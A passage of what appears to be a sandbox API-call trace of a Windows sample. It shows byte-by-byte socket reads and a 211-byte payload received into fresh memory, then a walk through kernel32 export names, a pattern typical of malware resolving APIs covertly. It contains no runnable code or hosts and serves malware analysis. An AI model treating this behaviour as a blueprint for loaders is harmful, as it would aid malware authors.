s=0x228, buf=0x31cf36f, len=1, flags=0 | out: buf=0x31cf36f*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf370, len=1, flags=0 | out: buf=0x31cf370*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf371, len=1, flags=0 | out: buf=0x31cf371*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf372, len=1, flags=0 | out: buf=0x31cf372*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf373, len=1, flags=0 | out: buf=0x31cf373*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf374, len=1, flags=0 | out: buf=0x31cf374*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf375, len=1, flags=0 | out: buf=0x31cf375*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf376, len=1, flags=0 | out: buf=0x31cf376*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf377, len=1, flags=0 | out: buf=0x31cf377*) returned 1 [0178.725] recv (in: s=0x228, buf=0x31cf378, len=1, flags=0 | out: buf=0x31cf378*) returned 1 [0178.726] recv (in: s=0x228, buf=0x31cf379, len=1, flags=0 | out: buf=0x31cf379*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37a, len=1, flags=0 | out: buf=0x31cf37a*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37b, len=1, flags=0 | out: buf=0x31cf37b*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37c, len=1, flags=0 | out: buf=0x31cf37c*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37d, len=1, flags=0 | out: buf=0x31cf37d*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37e, len=1, flags=0 | out: buf=0x31cf37e*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf37f, len=1, flags=0 | out: buf=0x31cf37f*) returned 1 [0178.728] recv (in: s=0x228, buf=0x31cf380, len=1, flags=0 | out: buf=0x31cf380*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf381, len=1, flags=0 | out: buf=0x31cf381*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf382, len=1, flags=0 | out: buf=0x31cf382*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf383, len=1, flags=0 | out: buf=0x31cf383*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf384, len=1, flags=0 | out: buf=0x31cf384*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf385, len=1, flags=0 | out: buf=0x31cf385*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf386, len=1, flags=0 | out: buf=0x31cf386*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf387, len=1, flags=0 | out: buf=0x31cf387*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf388, len=1, flags=0 | out: buf=0x31cf388*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf389, len=1, flags=0 | out: buf=0x31cf389*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf38a, len=1, flags=0 | out: buf=0x31cf38a*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf38b, len=1, flags=0 | out: buf=0x31cf38b*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf38c, len=1, flags=0 | out: buf=0x31cf38c*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf38d, len=1, flags=0 | out: buf=0x31cf38d*) returned 1 [0178.729] recv (in: s=0x228, buf=0x31cf38e, len=1, flags=0 | out: buf=0x31cf38e*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf38f, len=1, flags=0 | out: buf=0x31cf38f*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf390, len=1, flags=0 | out: buf=0x31cf390*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf391, len=1, flags=0 | out: buf=0x31cf391*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf392, len=1, flags=0 | out: buf=0x31cf392*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf393, len=1, flags=0 | out: buf=0x31cf393*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf394, len=1, flags=0 | out: buf=0x31cf394*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf395, len=1, flags=0 | out: buf=0x31cf395*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf396, len=1, flags=0 | out: buf=0x31cf396*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf397, len=1, flags=0 | out: buf=0x31cf397*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf398, len=1, flags=0 | out: buf=0x31cf398*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf399, len=1, flags=0 | out: buf=0x31cf399*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf39a, len=1, flags=0 | out: buf=0x31cf39a*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf39b, len=1, flags=0 | out: buf=0x31cf39b*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf39c, len=1, flags=0 | out: buf=0x31cf39c*) returned 1 [0178.730] recv (in: s=0x228, buf=0x31cf39d, len=1, flags=0 | out: buf=0x31cf39d*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf39e, len=1, flags=0 | out: buf=0x31cf39e*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf39f, len=1, flags=0 | out: buf=0x31cf39f*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a0, len=1, flags=0 | out: buf=0x31cf3a0*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a1, len=1, flags=0 | out: buf=0x31cf3a1*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a2, len=1, flags=0 | out: buf=0x31cf3a2*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a3, len=1, flags=0 | out: buf=0x31cf3a3*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a4, len=1, flags=0 | out: buf=0x31cf3a4*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a5, len=1, flags=0 | out: buf=0x31cf3a5*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a6, len=1, flags=0 | out: buf=0x31cf3a6*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a7, len=1, flags=0 | out: buf=0x31cf3a7*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a8, len=1, flags=0 | out: buf=0x31cf3a8*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3a9, len=1, flags=0 | out: buf=0x31cf3a9*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3aa, len=1, flags=0 | out: buf=0x31cf3aa*) returned 1 [0178.731] recv (in: s=0x228, buf=0x31cf3ab, len=1, flags=0 | out: buf=0x31cf3ab*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3ac, len=1, flags=0 | out: buf=0x31cf3ac*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3ad, len=1, flags=0 | out: buf=0x31cf3ad*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3ae, len=1, flags=0 | out: buf=0x31cf3ae*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3af, len=1, flags=0 | out: buf=0x31cf3af*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b0, len=1, flags=0 | out: buf=0x31cf3b0*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b1, len=1, flags=0 | out: buf=0x31cf3b1*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b2, len=1, flags=0 | out: buf=0x31cf3b2*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b3, len=1, flags=0 | out: buf=0x31cf3b3*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b4, len=1, flags=0 | out: buf=0x31cf3b4*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b5, len=1, flags=0 | out: buf=0x31cf3b5*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b6, len=1, flags=0 | out: buf=0x31cf3b6*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b7, len=1, flags=0 | out: buf=0x31cf3b7*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b8, len=1, flags=0 | out: buf=0x31cf3b8*) returned 1 [0178.732] recv (in: s=0x228, buf=0x31cf3b9, len=1, flags=0 | out: buf=0x31cf3b9*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3ba, len=1, flags=0 | out: buf=0x31cf3ba*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3bb, len=1, flags=0 | out: buf=0x31cf3bb*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3bc, len=1, flags=0 | out: buf=0x31cf3bc*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3bd, len=1, flags=0 | out: buf=0x31cf3bd*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3be, len=1, flags=0 | out: buf=0x31cf3be*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3bf, len=1, flags=0 | out: buf=0x31cf3bf*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c0, len=1, flags=0 | out: buf=0x31cf3c0*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c1, len=1, flags=0 | out: buf=0x31cf3c1*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c2, len=1, flags=0 | out: buf=0x31cf3c2*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c3, len=1, flags=0 | out: buf=0x31cf3c3*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c4, len=1, flags=0 | out: buf=0x31cf3c4*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c5, len=1, flags=0 | out: buf=0x31cf3c5*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c6, len=1, flags=0 | out: buf=0x31cf3c6*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c7, len=1, flags=0 | out: buf=0x31cf3c7*) returned 1 [0178.733] recv (in: s=0x228, buf=0x31cf3c8, len=1, flags=0 | out: buf=0x31cf3c8*) returned 1 [0178.734] recv (in: s=0x228, buf=0x31cf3c9, len=1, flags=0 | out: buf=0x31cf3c9*) returned 1 [0178.734] recv (in: s=0x228, buf=0x31cf3ca, len=1, flags=0 | out: buf=0x31cf3ca*) returned 1 [0178.734] recv (in: s=0x228, buf=0x31cf3cb, len=1, flags=0 | out: buf=0x31cf3cb*) returned 1 [0178.735] StrToIntA (lpSrc="211") returned 211 [0178.735] VirtualAlloc (lpAddress=0x0, dwSize=0xd3, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0178.735] recv (in: s=0x228, buf=0x5c0000, len=211, flags=0 | out: buf=0x5c0000*) returned 211 [0178.735] VirtualFree (lpAddress=0x6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.735] VirtualFree (lpAddress=0x6b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.735] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.736] closesocket (s=0x228) returned 0 [0178.736] WSACleanup () returned 0 [0178.761] VirtualFree (lpAddress=0x640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.763] VirtualFree (lpAddress=0x650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualFree (lpAddress=0x630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualFree (lpAddress=0x610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualFree (lpAddress=0x620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualFree (lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualFree (lpAddress=0x600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0178.764] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0178.765] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000 [0178.765] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000 [0178.765] GetTickCount () returned 0x113423f [0178.765] GetTickCount () returned 0x113423f [0178.765] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x600000 [0178.765] lstrlenA (lpString="kernel32.dll") returned 12 [0178.765] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.766] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.766] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.766] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.766] lstrlenA (lpString="ADDATOMA") returned 8 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.766] lstrlenA (lpString="ADDATOMW") returned 8 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.766] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.766] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.766] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.766] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.766] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.766] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.766] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.766] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.766] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.766] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.766] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.766] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.766] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.766] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.766] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.767] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.767] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.767] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.767] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.767] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.767] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.767] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.767] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.767] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.767] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.767] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.767] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.767] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.767] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.767] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.767] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.767] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.767] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.767] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.767] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.768] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.768] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.768] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.768] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.768] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.768] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.768] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.768] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.768] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.768] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.768] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.768] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.768] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.768] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.768] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.768] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.768] lstrlenA (lpString="BEEP") returned 4 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.768] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.768] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.768] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.769] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.769] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.769] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.769] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.769] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.769] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.769] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.769] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.769] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.769] lstrlenA (lpString="CANCELIO") returned 8 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.769] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.769] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.770] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.770] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelThreadpoolIo" | out: 